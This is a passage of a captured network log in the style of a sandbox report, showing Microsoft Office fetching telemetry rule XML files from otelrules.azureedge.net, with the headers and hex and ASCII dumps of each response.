                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:25 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1366
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                  ETag: "0x8DC582BDB779FC3"
                                  x-ms-request-id: ad69bf53-c01e-0082-08a7-34af72000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154225Z-15869dbbcc6rnr5chC1DFWwtp400000004sg0000000003m4
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:25 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  111192.168.2.44986613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:25 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:25 UTC515INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1360
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                  ETag: "0x8DC582BDD74D2EC"
                                  x-ms-request-id: 7cd96093-b01e-0070-32a5-341cc0000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154225Z-17df447cdb5qkskwhC1DFWeeg40000000cqg0000000087tf
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:25 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  112192.168.2.44986713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:25 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:25 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1427
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                  ETag: "0x8DC582BE56F6873"
                                  x-ms-request-id: 384ed142-801e-0047-1f8c-327265000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154225Z-16547b76f7f22sh5hC1DFWyb4w0000000ftg000000007v2v
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:25 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  113192.168.2.44986513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:25 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:25 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1397
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                  ETag: "0x8DC582BDFD43C07"
                                  x-ms-request-id: 933b88d1-c01e-0079-80a0-34e51a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154225Z-17df447cdb59mt7dhC1DFWqpg40000000cc000000000090k
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:25 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  114192.168.2.44986813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:25 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:25 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1390
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                  ETag: "0x8DC582BE3002601"
                                  x-ms-request-id: f81db1ec-b01e-00ab-60a2-34dafd000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154225Z-15869dbbcc6tfpj2hC1DFW384c00000009v0000000000vf8
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:25 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  115192.168.2.44987013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:26 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:26 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:26 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1364
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                  ETag: "0x8DC582BEB6AD293"
                                  x-ms-request-id: 9dc908ac-101e-0034-7fa0-3496ff000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154226Z-17df447cdb5t94hvhC1DFWw9780000000crg000000005czx
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:26 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  116192.168.2.44987113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:26 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:26 UTC517INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:26 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1391
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                  ETag: "0x8DC582BDF58DC7E"
                                  x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154226Z-16547b76f7fknvdnhC1DFWxnys0000000fs000000000p701
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:26 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  117192.168.2.44987313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:26 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:26 UTC517INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:26 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1403
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                  ETag: "0x8DC582BDCDD6400"
                                  x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154226Z-16547b76f7fx6rhxhC1DFW76kg0000000fx0000000002nmy
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:26 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  118192.168.2.44987213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:26 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:26 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:26 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1354
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                  ETag: "0x8DC582BE0662D7C"
                                  x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154226Z-16547b76f7f2g4rlhC1DFWnx880000000fn000000000qh8e
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:26 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  119192.168.2.44986913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:26 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  120192.168.2.44987413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:27 UTC538INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1366
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                  ETag: "0x8DC582BDF1E2608"
                                  x-ms-request-id: 3018dd1c-101e-008d-1bd2-2c92e5000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154227Z-16547b76f7f8dwtrhC1DFWd1zn0000000g1g000000000vbb
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:27 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  121192.168.2.44987613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:27 UTC494INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 1362
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                  ETag: "0x8DC582BDF497570"
                                  x-ms-request-id: a8f5567d-f01e-003f-7aa0-34d19d000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154227Z-17df447cdb5l865xhC1DFW9n7g00000008z000000000ek5h
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:27 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  122192.168.2.44987513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:27 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
